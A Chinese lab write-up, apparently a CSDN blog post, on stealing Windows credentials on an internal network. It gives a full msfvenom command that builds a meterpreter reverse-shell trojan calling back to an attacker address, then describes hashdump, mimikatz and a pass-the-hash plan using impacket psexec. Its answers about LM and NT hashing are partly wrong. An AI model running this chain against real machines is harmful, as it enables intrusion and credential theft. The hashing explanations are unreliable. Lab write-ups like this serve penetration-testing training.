码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 抓取内网windows密码和利用hash横向及相关问题


    目录

    实验准备

    用msf拿到shell

    抓取hash和明文密码

    相关问题

    问题1.通过hashdump抓取所有用户的密文为什么分成两个模块,这两个模块分别代表什么 ?

    问题2.为什么第一个模块 永远是一样的aad3?

    问题3.这两个模块的加密算法有什么不同,如何加密的?

    问题4.windows登录的明文密码,存储过程是怎么样的,密文存在哪个文件下,该文件是否可以打开,并且查看到密文?


    实验准备

            一台kali

            一台windows10,防火墙和实时保护关掉。

    用msf拿到shell

    1.先生成一个反弹木马:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.247.135 LPORT=12345 -f exe -o shell.exe

    2.然后挂到网页上去win10上用浏览器下载下来:

    3.msf开启监听,然后点击木马上线:

    抓取hash和明文密码

    1.提权后直接hashdump获取hash值:

    相关问题

    问题1.通过hashdump抓取所有用户的密文为什么分成两个模块,这两个模块分别代表什么 ?

            因为这两部分是不同的内容,第一部分是LM哈希,第二部分是NT哈希。

    问题2.为什么第一个模块 永远是一样的aad3?

            因为LM哈希不安全,都是aad3这样的内容说明LM Hash为空值或被禁用了。

    问题3.这两个模块的加密算法有什么不同,如何加密的?

            第一部分是基于DES算法加密的,第二部分是基于MD4算法加密的;

            第一部分加密过程是用户密码首先被转换为Unicode格式,然后使用Unicode Little-Endian编码进行哈希,第二部分是将用户密码和一些随机数来结合计算出的哈希值,更复杂更安全。

    2.然后现在尝试抓取明文密码:

            用工具mimikatz,先在会话中导入kiwi:

            然后尝试抓取明文密码:

    发现密码这一列都是null,先看下面这个问题:

    问题4.windows登录的明文密码,存储过程是怎么样的,密文存在哪个文件下,该文件是否可以打开,并且查看到密文?

           登录的时候会启动一个winlogon.exe进程,把明文账号密码发给lsass.exe这个进程,然后这个进程会干两件事,1是把明文账号密码在内存中存储一份,2是把账号密码加密后存在SAM这个文件里:

    但是这个文件打不开看不了。可以利用其他工具来看。

    现在回到第二部,因为mimikatz这个工具是利用了lsass.exe会把一份明文账号密码存到内存中,所以才能抓到,但是由于系统补丁才抓不到了。不过继续横向不需要明文密码,因为系统验证都是通过比对hash值的,而哈希值又是不可逆的,所以知道明文密码也没什么作用,反而比hash麻烦了一步。

    3.利用hash登录

            这里直接利用kali自带的脚本,/usr/share/doc/python3-impacket/examples下的psexec.py:

  • 相关阅读:
    Java | abstract关键字【面向对象的第三大特征——多态】
    【2021集创赛】Robei杯一等奖:基于Robei EDA工具的隔离病房看护机器人设计
    SAP PO用户参数权限EFB
    JDK8使用Optional避免NullPointerException
    Spring Boot多线程详解
    java开发工具IDEA JVM框架教程:Google App Engine配置
    贪心算法总结(未完结)
    Redis学习(1)
    iperf-2.0.9 在 Linux下的编译 与 海思平台的交叉编译
    36二叉树-翻转二叉树
  • 原文地址:https://blog.csdn.net/vt_yjx/article/details/138010638
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号